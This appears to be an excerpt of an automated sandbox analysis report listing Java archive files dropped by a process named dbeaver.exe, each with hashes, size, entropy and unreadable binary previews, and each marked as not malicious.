      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.UQo.0.~G.?Xy.....h!Q.vm.u*[U.n....V.;.......H...C....;.."x..0......^.qU....ig"."e./$c..*.R'.k..2Le.K..i6>."..k./.Of.C.#j.3x.F....FF"3c.<..}...tRT<7LS.sc5}..q .rP+.<E..R...$.h..[.s....A=.....O..H..J..n..(;pl..R.r...wJ....A..+<p..........k.....b.R.A]..(....6.........^..)W9.3.qq.j....k.+.(.!"".8.....P..&3.I..Q...X2.;H.2....0..4..}Y%D+..... .;~..k])x-.,...v.n.u.O..XM.[}.@.Q.^O<T...%.7.",#.%..k#*.`.z.i.A.g.P.....6.6.t.....7H.....6$.F....Y^O.t....:...0.I...I[7...v{..w...`.....2.GB_Ir4.?_....q.....N.(K,A1..[.Eq..0.$.f.f.3.C.<G....gl..#d..x.BN`..uXaxZ*.f0..D..g7KeTy.i.6^....(.M?].!...w0...8..x|q._...<~...x....A|1j6..].Q..r..3...lP.".q..qo....g.....;..nwb_...l<._.W.Cr...j.c.........w..Y..v...kW 5...M_N..@.Y.9}...Y.........m6...PK...oH~....9...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):20356
      Entropy (8bit):7.565466965896976
      Encrypted:false
      SSDEEP:
      MD5:CCBD12EF6ED24C182A3B6468E393EA42
      SHA1:A2366B06F31045B8277493EDD97240CF5BBE5661
      SHA-256:C1763296D98638B4E78519209DE71681568D2AFBCD31119D33DA2C16358BEB25
      SHA-512:061120E55C9CA9748A8317756730288238357048659C6036FB9E37D12B05E8316BC465D79FEEFE13524886703B012E5F6BA36EC77F51B76DBB476BD04B2F266E
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.Tao.0...)....H.B.....].u...j.n.>.s!V.f.I....&..U..Al.{...^.T..h.>..\.....;..,...]....D...T.'u.=.j..x).?...J..u!.....]....N...DU..I...%.y........hq.f.........P.HU.\.@VR.#C....bP.^OP7......L.....q.v...4.<...@..ck....Q..U.Dumd.....J...<v..:.}..n..u...d.w7!9D.......A.B.q......x.(.:.;_.\.R.L.P..vS.l.wX...<^P..P.......&9.,..aP..\.MS.4...Fd?7.IxN.s..).^.-+.lO.....w.}...v.'.?g/..../.!......7.*.P._...0).0.0...B.....x.rD...].....8...%.....eE)...4.X.Db...h. R..y..k2....t...~..g).qo){...z......D.._.;..z.....l."x.W...=.Z.^~8.I.L....&.`.h. 8.4.^..t6?a..38.......m....;.M....~T\...-i.snv..=.h.s.i.1x5..?..//}k.f...b.'(b.....w...s.S...8.=qa.....PK..L.yM....Q...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):47710
      Entropy (8bit):7.759801269093194
      Encrypted:false
      SSDEEP:
      MD5:F4FF633129209E607B8CC02CFB248275
      SHA1:0F6D98F06834A911D04BE512B751DE3563D6B909
      SHA-256:9F11C68980DBD931850F3F27FC7C35E1D710ECC728FE872BD6D786CD7E4B7B5E
      SHA-512:3C324D94E2852C31410EBDECD9A16845652D080FC0FC6FC708D58227B9708ED4C34DE5D6D17AA841C430CAB706B5F9DF926A6BF1C0C313575533D2FD37F619AB
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.T]o.0.}...`...R.4.F.D.6..C+L+.H<..mj-..._....Q.!...{.9..z.....#h#..HH...EeU....D.U..GV@D..2....Rp...i.7.L1.R.k-....~I:..;i..!.6.*b.@.x.J...d,....-..Ei..O.k..E.L..U.d.....u.[...JNh..t..*Q&....@.D..k.....E.H..x.........\kU.^\.F2?...{). .A...4Q. .j..0..k.*.p...]d..i..a..U.<................Ze......8w...>.!x.....a.p...%..f9.,..aPa.... ..@..m..$A.8..Q.^K.*..A..m..w.}.m.}....~...-8..D.B.w,2a.....Ns...JJ../...".....P..#.._..s..D.UD..e.>.yQJ..$....b.....G........0...A.....~8........c..eG....F.9./.....E.B:.......3.eR*.C.m.....E...K8.{.Z...Q.q.i.{.."".l8..z4..#.R..)cix...... ...h.W.Mq........].q..+...c%..\...f...\.8;.W.Ug.-...6... r.v;..n.. h......q.&E7.\ .io.._PK...:v{........PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6s
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):30379
      Entropy (8bit):7.64870625756286
      Encrypted:false
      SSDEEP:
      MD5:7480EA347CC8D6A6F9E77D54060058ED
      SHA1:E9834F148346BF3F698E2179A287C29D1196A894
      SHA-256:83D9CC2B62500D2E438BE91C157659C2D693A262CFD14EB9B916286CA627ED00
      SHA-512:FD602D21BF1870FC4695B3C07AB385E7DA6E19CF5AC3091E573B75EDE0C8D89E4E02F14DDCE040315BF39CAE06C338997E945CB0490770DD7AA7AAC297D26A82
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.TQO.0.~...`.aj.&iZXi.H0`..n..6iO.sM-.;.N.......`{Hd.w.}..,..+......!..q.wR.YP...i........2O.{..3..0..J..>T".SY....&$....w.(. ...Hb.@.Y.K...d.&E.s..)^.K...#@Q"Y)p..YI.:...GA......n .%...L.....q.v..14.<...@.c.....q..U.Duu.....Z...<v..:.}..n..y...d.7W!.G.......B.B......x.(.<..ok.I.d.hA.H..1......W...\...w.+..4.`!P6...M..n...!.80j.F....\.wJ.k.e.........xw.......=.....7..t...=...YW....u.}...B...iV.......J...G$....K.|....#..Y..Y..\V..]qA...H$z...v.".*|k...6..7.O..|:.f.i.w..............D.^b.;6.E.9+l5....^p..pM...x..$$i2.3x?....)....48...l~..Hgp4..._..Pm.v.....h2D.7.Pq..%Z..........Q.....[....y..1a&..,f}."F.a...>...@.2.a..#.Y....?PK...rFc....[...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..x
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):20165
      Entropy (8bit):7.669248341842957
      Encrypted:false
      SSDEEP:
      MD5:AF897BBDD6AF5601133C19865A7DB4FA
      SHA1:44351FDFB119EE920394C1A27C938288C93C03C8
      SHA-256:43C7C870710E363405D422DA653CCE0D798A4537F76E4930F79BCEADD3A55345
      SHA-512:BDF3AFDD59B791AD415706CC892EC5CC1E83F622C79A08D82A8F5192E03AF74E96709D4BC6A3105B8A2950FE3440B930767CC03C3F9022D878E7E83D2A46B286
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.TQo.0.~G.?X<L.T $....u]...f..j.A...l.,..;L..V......w....%...m.;P.K..(...YkdM.g.R.m..gZCL.*..K.hP.. h...u.".s.../.&&.%..1.Q<CP.....\..7..{..XJ...;.L..X>_V......J...H!..\..p..IA%Q0}...J6(.u`^B...J...-O... nB..M=[..T.\..J..l./.J#._.t.=..$.VU..6..q.".v..cP...%.....>2.L.q..+.*4^.YC...i0I.......4J.....M....>.!x..8.4..p.....A.....e.0..D.v..$=..#..5.I.^Rqq?(E....b...y.p.=h_>....{........|.....(.Y.Y........B..~iV.....T.BN..G$.7..s.|N...#..I..e.N|V7./....zWg....)...K..m...3.@0.L..b6...\.l.2.5e..|.\..1R.b.U]rs....).......l...|......cJ..5...c.A>..."r....r.....W........W.|q.^....O....v23.xd9v^.4.N.cd..~.}?#......G.G..:...PK....oQ........PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):13697
      Entropy (8bit):7.571537750540321
      Encrypted:false
      SSDEEP:
      MD5:51CBBFA59E94343B388643EC7D9D91AD
      SHA1:556C89F6B2BD483FFE416B296392A816AAC4BC1A
      SHA-256:59BF433907FE38B46ACAC4B771A8FFD3A4D693248BBD205968129D25C1A7D019
      SHA-512:30B3360CD06370053DD8835B4DA044763041C323DE138FD9E560FB6A83A294C14619EB33EBDEAEEB1AA4B3C18682A4967C7893443920CBE22B3E1BBDBA472F33
      Malicious:false
      Reputation:unknown
      Preview:PK...........F................META-INF/MANIFEST.MF.....T]o.0.}G.?X<L 5!....Hk.j7A;....qn.UcgN.c.~....R;E.....s.GVL....y.S..(.]..Q..dE..H.$.=..~8..."`....\.G#.mII.$].#..[A...Lq ...+.x~.s.6Y[dA.............nD^Vr.@s..Q.V.J....m2W..p-[pps...Z...f.d.....:.........1!#.R.....gD..D.......ap%.2..-........l.2.....{..o@KT..hP(J.zo.......-X..6..).S..Tr.^C.i....f. ..'/9.:.....\.G[.:[..(\....9.......jd.i3_Q.72...k...L..x/d...p...Jl.w..hE....J...C...H.....].1...?6..*.......j.li.hxa..3l...X..ss..c..5.H..0..G...T..k....t.3.......[...u..e3mV.v..Z9uR..W.x:.a..kJbo.N. .zl<..'...|...4.y....h4.B....{a......).c=n..,...C.N.S...}c..Y..g....C.?.....Q..]....i....PK......e.......PK........&.uE................LICENSE.Z[s...~...r.Si...4i...CiD.n&..%. ..... ...=....dw.VM.5I........E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........j..T.;=.rn..k3.'....M#Z%;1.I.e['dW..t.....bt..V..Tc._.^.>[i7X...{!..pKU..A.U.B......N..>hx.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):31309
      Entropy (8bit):7.7357631571773915
      Encrypted:false
      SSDEEP:
      MD5:3A70E5A2B7E046EC9B98F0A283C798E7
      SHA1:928120B7D36CB41D1F43BB53BDEAD28E308AE191
      SHA-256:F76DDECE1420351CBBE6E19E17B00FB3B4B1633C3E4AFDCBE9D0B8B2DB4BDD7F
      SHA-512:AF26F95EBF7B85CFDB74F8F44A9AF267C566CD0826B212F90A6048833936782C08FF7BFCDC412430A37511C67CC63EF8F113A65C01CF3F92095221B89735207F
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.TQo.0.~...`.0%R1!Y.....M.V5k.Wc..*.m.e.~.4.k.j. ..}.}..X0)V`.....%#..Q.wV9U2'..PYU......er.l......h.....W2.s.wF.k......w..."...)..@.y!...Aa2VR.s....]C..r....HTI\e@V.....U.{.....07P(....b.%.ER..m~.-...1.(6.....2GL27..^\WF.....\..[S$..9m. @..v......*~{s..}d.....aW(UZ..3....1..Y.W.}[.K.Q.a%a2k.f.7..jodN.j..VX....=e......,..I....j6mA..@.8".=C....B..N)z-...o<.....:...C..zp|8.....py..H.~.I........j^G.+).7vY^F..5.(.....H........3.G..d......._.....L...?#v.2S&zmz..2......h6........q.5..,..Z.i!....{..w....!....YD.t2..n:..S.2..1cY..M&..1O!...t.cy.?+a..4KE!..K...D...%.....[...sy.4m.]8.4.k.e....Y../~......tb%....{...PK..............PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):36679
      Entropy (8bit):7.774821050079581
      Encrypted:false
      SSDEEP:
      MD5:1E2E9BCEEB159161A7AB24020F513B65
      SHA1:8BC0747550A67ECC237169E4B071995D9AA9CD20
      SHA-256:E9AF5301DBC71F548C8F9B85FDD4A8532FC1290F5388867B94DA57657298F8B1
      SHA-512:FFB9EEECE651DE92EF5440C98259F96C0E31C7CF257D5D4A0CA5445E060D9B839AB91C078A6B513CFB5D12B0DA7756770524BAB0342F702B7CA6427557EBE3B6
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.Tao.0...)....H.B.....].e...j.n.>.s!V.f.I.......U..%......XR...{.Js)B.x.~.2...3w).*..+- $Re....4.-g.U..i.E....)...r.x.1!i.d....F....&F...r.r^j .$&c9..f...r..Zp.(Jd+..R k.^.C.$T..#.-..3......<....;.......(;vl..R.s....%....H.%.;..<..Uy.l.)u..........;.A.no.Br.L%.]\.v.z..K9-).;..Q..;.7\.R.L.P.Z.)c..=.G5./....&T...X.E;h...B.l......4.IC.q`.Z.$<'....B.J1.7...../....I{....oh...2$..~`.q.......T.7"L...z.Y.bPh.P..9......Hg...wr.D.Y.O...bu.....w..E".7O...T..az4..3.O..|:.f.i.w.............Dx...3j.u....v8+x..n.9..>.\..>..$M.s..f.y0c4e..Q....t:.........8...\..._.w<.........o.-i.sn...{.....(b.n.....#....0.....V(b.......t/S...9.=..~....PK.....Y....`...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):43876
      Entropy (8bit):7.80075908415179
      Encrypted:false
      SSDEEP:
      MD5:0932B8CD7090A9ACDED18F03A1B7AFE4
      SHA1:66F720098CC1ED54AFDAB542214F580E376E34F3
      SHA-256:E78911F12F8823E24A3DDE68BA16502A7DD7F4C630386215B0AC7C2EDE25B9A7
      SHA-512:F0868568E4C94D43E192F308ADDA16D1518B43F318F225BA9BE2579C527E34D033EC1F029FA666C2F2AE23BC4CCFF1BC17A07263C715F169587010DCDC37D4D1
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.SQo.0.~...`.0%R0!Y......N.V5k7iO...*..6._....j....w.}.wwK&E..w..P2 >..{..U....K.T9._Y..Q:..d......n....B.{.+.`.B.;-.....H.|.7i...X.b..k .<....Ia2.S.....Ei.N.V......*...H...|.y.T+..G...U..P....&.>....ZN..C"Qv.4..(}/dV._hU.NX.GB....\..[.G.......8..e.A...T...* ..Dq....P.4...5..:.........Ze....q.q......`.A....4...e....9.,..I....6.. i. ...V#.....R.Z.Ui.x..-o.u.;..q<Lc..'0x.(...Th..I&.):...kD...x..E.AA...^..qD.. -...s..D.U.O.-."}..n*$.;."Vh.7..d.t..2=^n:......c.6..{..J..{..=.^-.nZ..ip...>..Sg.*......+...a.{\3|"....|..$..9|.M........X.g..l~.cHfp<....e...C../...&C.q..+...X.b...kW.....q.Q.....[..W`u.5..?.4..B.!..\]....{..."...h...~..PK...5/.....`...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):23641
      Entropy (8bit):7.6887410621325065
      Encrypted:false
      SSDEEP:
      MD5:60DA2A7F440A142095E729639EDF2025
      SHA1:9FE65A02596B68E06AAD340F41E33D53E3F7B8A7
      SHA-256:208819C7C71690C15A6BB8B187474E7F9D0147946B680182A62B9F222AE014EC
      SHA-512:3B60EECA88CFCB5B48BCAE38C2E9C387648F014932B175C1343AD975ECAC0BC0AFE0AA7BCFFFC1B520FACCB36C75BD85B2F8CBAC136B22E15460388BECFA870E
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.T.o.0.....p..H.B.....].u...j.n_.9.U..m.e....$..n....w..3).4.Em..1D..uNZ.jf...*o+....cP...)E.ZQ.E+.%..oeNA..YkQ.m..%...v.j...6`..%.9.Dc.>(..'<gh.....|]\."..R.$.r.B.W...p...q.eGz..j.&. \.X3Q..._.....o...^....wB.D..Z...t.I..^t.4.,.FW....1q...j..(.....T...2.md........Gi.2N....$..,..-..F.R.....j3....)?...\.U..F.QQ.=..e..%B..(.6..~.I.......5@"./....;.ZK.Z.....F........m............y.-.|...v.f...;X.:.......^.....r..&....Mt.....-.xT.?.[V....u#.BHV.U..LQ..k.nQ.J....G....x4.F..(.N&.s..Q..W....t...#.....B..\v...>/>..g...w..,.r.s.....l2...y.......u..g+4.5X.2Q....f......So.f.p.~..]..}.s......2....T...~l'.......D.hX\.u..PK.............PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........j.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):26354
      Entropy (8bit):7.8083479459079825
      Encrypted:false
      SSDEEP:
      MD5:0E63BA666B870461F13DA6050517F5C6
      SHA1:ADEB47DB1323665E23D74FA77E928A825A0A44B2
      SHA-256:48B9F38674C04F9386CD87EC8ED5718138381B14FE5A6D3E156F86A092E0C222
      SHA-512:3ACA2B0B5868371A45E3A8A0B45C673AE97EE75DD2A1970E2AEF952F84C13B3AD15A6C1F6171A8F93F0A5E16E0E90A433235E8A1EFAE6D55AB1A1266A5AD2EBB
      Malicious:false
      Reputation:unknown
      Preview:PK........3.AL................META-INF/MANIFEST.MF....}TQo.0.~G.?X<L 5&....Hk3.n.v...../.jb3.._?;.@..(9......2...Pj..T. ..n.u+.3...K.S..G^0..A0...&..,.'.....Z...n.C..;.n.S......^!...=l.ha3.v.......pC...D...D.,6F....J.BReX....9.......F..h.z.....r.1g.Y..AAy.q...5.!. A..:o.t&.....?..{/.t...h...$..n.......<-f.}.5........d......x.:.x....F..@.}...F.rjAF.;55.......Mm..W....N>...f...,..2..T.u..q..U.U.a.q..).$..2)...c.=.9...7...`.....Y..X).s.&R....'..}....o._....IE.Y...~....va\..=7l.b.T.sn..|....G.GE...f..T...[...C;.i.B...N...Q..i...u..V.......A4...*L...k.)[..0IC..........8X......\.....6..LR.kP$.t?u........}....3..H..d.R.<..]/pC?..._PK..n...^.......PK........N.uE................LICENSE.Z[s...~...r.Si...4i...CiD.n&..%. ..... ...=....dw.VM.5I........E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........j..T.;=.rn..k3.'....M#Z%;1.I.e['dW..t.....bt..V..Tc._.^.>[i7X...{!..pKU..A.U.B......N..>hx.c...X/c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):14057
      Entropy (8bit):7.60647810996753
      Encrypted:false
      SSDEEP:
      MD5:E2CEBD7F978E18399B3A8F786619C616
      SHA1:506F364FB3CC6887E26D40FF3FB46F36E5E6F3FA
      SHA-256:02B7F6900EFD470B612ECD755971164E1E6C5CF98F587C201D0DA3BBC9CB5F3A
      SHA-512:5F1DB1484B06E718DF2458E790449211F5C766ED402519163170DC9AE8772BB25CCBCB0A6A11F49954D98E218B67EFD7FF4F3A0EE2733CC21C90E4E187F1B7F9
      Malicious:false
      Reputation:unknown
      Preview:PK........X..F................META-INF/MANIFEST.MF....}T.n.0.}G...<L ....4(.Z..N.N..e...\.jbgvB.~...T.......s.u.T....~....!......=.....8$....^......C@)....w..7EH.%i.6y^.sr........!...m.l..Aj.h6.hP[H.Z..h.x^Tv*...r4*... +..TkG.5w..N.57xR.@Q\b..;W.B*s<..!..d....+..RB.1.4...o..m.U..K.5...K$....dS.y...9G.n..q.BC.BSB.R1.p..XwiN..|..o.1I.x.,.A'..=.6{.L..S...<9.3.n+89...S....k...T.C..GOX...~..6...d..R....M.c5...%O..W....*..e!..e...+9.tr.~.E.K.....%..2.D/ ...w..a...N.y.n...4...............(K..].RU#.n6...Oa....:.o..EVu.5.q(..:.........D....E..L.M.h).}.X..{x.....!..Q0b.....06.. `.`....I.5...}h6...l..89...;~.m-.w..~hp.c..b.....x....Fk}j....tK..v.(..n...R.!1.5.....y....T..PK....Ee........PK........&.uE................LICENSE.Z[s...~...r.Si...4i...CiD.n&..%. ..... ...=....dw.VM.5I........E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xws'>...qw}{ws..-~].SW..........j..T.;=.rn..k3.'....M#Z%;1.I.e['dW..t.....bt..V..Tc._.^.>[i7X...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):85659
      Entropy (8bit):7.847597606593533
      Encrypted:false
      SSDEEP:
      MD5:9EBF9E52AE63E0FBB893F896C0714A6D
      SHA1:8C9FE683028FDCFD8D8B3FB9175EA0D4F582A3C3
      SHA-256:7053C57E7D7D88FEC6B90979A3AF125E1D2BB847268A328A2F1ED65AD0A4C185
      SHA-512:BE222309F4AC8B8CC48DA708BA3A51B4AA6E9D714571DFB14A116823B3B91CC8519F89F46BA64E79B84816AA58A4B810E389B2C6005B0CF987810EBFADD7013B
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.T]O.0.}...`.aj..i...D.`......l...I-.;..]..w...@{h.{.=........eJs)B...pp\.Y....i]0..)Y....9.....,.f...Z..s"......[....N....T.....3Z.J3.QB2T...9e.*^.K.....@Y.Q)`.2.I.o*.Q1..&..FI....Y.5......."n..6?b-..... 6vl..R.q..&:W......\~[..R...U...J...8..%.A.......2D..TR..ua..2..).+B7...4J{.b..k.v....M(....oD..i...(.;.<..$)..BL.4.*5....QK.p..=........z...V.z..-o...{..&.z0......\..BT..{.97.:. .k....Q)....M...B...^..p8A.N^...h..8...%......iY......s.g.n.H.....'S...i...?.gs...W%.q...#.k..."v,....ja.t....g....3.s..mC...n.................O..}...t>.f..b8.(......c.....5..../..H..nv.c.....d.n.x...._.yv8...#....}..7......s/R&..8.=...`8..PK.....f....I...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-.7..xw
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):18738
      Entropy (8bit):7.7173997753781585
      Encrypted:false
      SSDEEP:
      MD5:F83813973C132E777F18AF9DC4A4852A
      SHA1:984B3991D8B881CCFFD46E0E961CADD04511CC8B
      SHA-256:D28C9A8A747D39DE73805DC91F840F99A8A177AE2F85F6052A532A204F6F7538
      SHA-512:3E26EBA7E1AC83EC27B89AF6720F0762B58FA981ABA92F3D64C64D101B9593D36299E7DB518A73B0DA874C08DAF433B73392A8E18DAE338DBD3162D1DBD450E6
      Malicious:false
      Reputation:unknown
      Preview:PK..........A.................META-INF/......PK..............PK..........A.................META-INF/MANIFEST.MF.T]O.0.}...`.aj..i..D.`......l.\.6.H..v(..MB..c{h....{...I..c.[.F(......qiU...\%e..g.CH.N.2.....}.3.......b.E..!i.I...$..K..XE.....Da.|P..,J.<.`.....|Y..$....$>%@VJ..A....W..=.{.T...!....,...Mz.......h2v....2E>r.UY.Q..u.....K..Bnt..kk...>.l6.F4..n'P...."..M..]...`........(J.Z...0..*.,'L&u...u......l)h.2C..<a=.=..-3 ..t.......MB..@....F..2!.:.XkiT.y]S?kt....y.?._;{]..[...-N.!)..;....rI._!.!.JJ.u...C..k..z.C..$..9yI.....yT.>.[.....y!...lO.6_*......d.t...._\:...8..&.`:.8...Bi.]1~..e...x..p7*.Ya...x..h.4.3.6l.+.2...`/.m.....pu..x..d9.qx7..)g.....$x.&.../!...t.8.....'Z^........x...W)4~.X..".v.|.(@...N9...?..?a.._....._sV..1..*......2z..H+V......9.?PK...%6....W...PK..........A.................META-INF/LICENSE.Z[s...~...r.Si...4i...CiD.n......."..(6...s..HJv.o.dZ..={....Y..E/...u.:.^<..?.u.t....B.Mv........<.h7...W....\.6sc.....z....~Z...J..Y]-
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):439860
      Entropy (8bit):7.929274668103802
      Encrypted:false
      SSDEEP:
      MD5:9531ED7FBF89BFA6CC6CADA2DD438D51
      SHA1:E29692F97D9D2CE3CDDB3FBCC2E9F5D9BE6C3C82
      SHA-256:0E7AACDD976DD958291E6A5599BDAE0D40246FE1277B7B63A80DB0FC92D469D7
      SHA-512:A1390A95EE03BA837E5BEA27E348DD805F8702B9533E31DD412C4577134FDF97D6C5684FF2ED1ADCC7DBDF24964B0DD37EE9E151707B3150467822A66CC51FF6
      Malicious:false
      Reputation:unknown
      Preview:PK...........Q................META-INF/PK...........Q{.V.............META-INF/MANIFEST.MF..Qo.0.....V.i/..,..T{ Y....J.N...^..l..}....&.)}....w.._..u..0Vh5&!..^l..(...o%..K....`..`.<&q..#....|oR.....H.I.@&`.4.4..OU......:U.. ..K[3jCK...|x...6.~.......fK-s._.ksH:..g.... ..Q8.........?..K.u.h.].h.>.....A.....t....t,..3L(g{.T.s,.....~/F.^.6.7.i......j.z!.t.IQ...C..i.....;/.9g.h.l.....m...i-.j....)(...=..]...s..ZW.T..ent)....I..x.,..7Az0...f.0+.......c.s...kmp'.Dg....4..{......v.M.K.@...I..A:2.r...L..5.OVd..F$ .J..t@..q..h\8.....N.v.US....5...0..v....L..hUu1&.h=.B...|..PK........B..Q................org/PK........(..Q................org/sat4j/PK........(..Q................org/sat4j/reader/PK........(..Q................org/sat4j/tools/PK........(..Q................org/sat4j/tools/counting/PK........(..Q................org/sat4j/tools/encoding/PK........(..Q................org/sat4j/tools/xplain/PK........(..Q................org/sat4j/core/PK........(..Q............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):443025
      Entropy (8bit):7.934128424893747
      Encrypted:false
      SSDEEP:
      MD5:BB5B3BDF362AF1B2488CD011188E0751
      SHA1:B5C6ACAC9AD833B30C86697577FE191D50C76CAA
      SHA-256:24F88ED3315959C414334373DED1C1006278D90E691E6395CAF72F1BBB91A7E5
      SHA-512:7DECEB2827DF798F99A01F96F1309575FCA7D0E0D3C3321F0BCACFFFF544802E5C290BF6AC79AFE95D3F08083BC7BD13BB91905BF50B1264DFD1469EB8874820
      Malicious:false
      Reputation:unknown
      Preview:PK........2..Q................META-INF/PK........1..Q.yN.....G.......META-INF/MANIFEST.MF.T[o.0.~G.?X......l.2.dyh..(.{...4qklf.....@KS.K...]...!.J.u...+....Da....5...Ce.c!.f............e.....JH..... ..........5>c....U\...z.=.....L.m{j.}%./.Z..!...K.....G>...N.$..x...C...k...n@.^w......c.a:....P..=..Sz/.s...;&^..k.=..|.....:............'X.]...,.fT...)....o..?.0.;.q8... ...3I.}..YR.2k...I.}....&n.k-.p.`.^...Z.XV.i....W}Y...P.%.A..^@vv.....V..]g.4..c...... .15N..r..d.3.~m.....b<L......s.ja.jz..E..qL..Uo....).[...a..PK...........Q................org/PK...........Q................org/sat4j/PK...........Q................org/sat4j/pb/PK...........Q................org/sat4j/pb/reader/PK...........Q................org/sat4j/pb/lcds/PK...........Q................org/sat4j/pb/tools/PK...........Q................org/sat4j/pb/core/PK...........Q................org/sat4j/pb/constraints/PK...........Q................org/sat4j/pb/constraints/pb/PK...........Q................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):116013
      Entropy (8bit):7.862486406875709
      Encrypted:false
      SSDEEP:
      MD5:57C2FBFEB55E307CCAE52E5322082E02
      SHA1:1EA4BEC1A921180164852C65006D928617BD2CAF
      SHA-256:211B306CFC44F8F96DF3A0A3DDAF75BA8C5289EED77D60D72F889BB855F535E5
      SHA-512:A4362DB234D4E83683E90F5BAF90C82107450CC4404ACAB96E3FAB14B8A3D4588A19722171D32F27D18463682A6994CAD9AF0B1065C954E3A77EA7BDCF586BAC
      Malicious:false
      Reputation:unknown
